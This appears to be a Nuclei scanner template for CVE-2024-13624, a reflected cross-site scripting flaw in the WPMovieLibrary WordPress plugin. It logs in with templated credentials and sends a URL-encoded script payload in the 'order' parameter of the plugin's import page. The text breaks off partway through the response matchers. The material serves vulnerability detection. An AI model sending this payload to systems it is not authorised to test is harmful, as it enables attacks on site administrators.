id: CVE-2024-13624 info: name: WordPress WPMovieLibrary Plugin <= 2.1.4.8 - Cross-Site Scripting author: ritikchaddha severity: high description: | The WPMovieLibrary WordPress plugin through version 2.1.4.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'order' parameter in the import page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. reference: - https://wpscan.com/vulnerability/c19b56cc-634f-420f-b6a0-9a10ad159049 - https://nvd.nist.gov/vuln/detail/CVE-2024-13624 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N cvss-score: 7.1 cve-id: CVE-2024-13624 cwe-id: CWE-79 metadata: verified: true max-request: 2 product: wpmovielibrary fofa-query: body="wp-content/plugins/wpmovielibrary/" tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wpmovielibrary,authenticated flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} redirects: true matchers: - type: word part: body words: - 'wpmovielibrary' internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=wpmovielibrary-import&order=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '">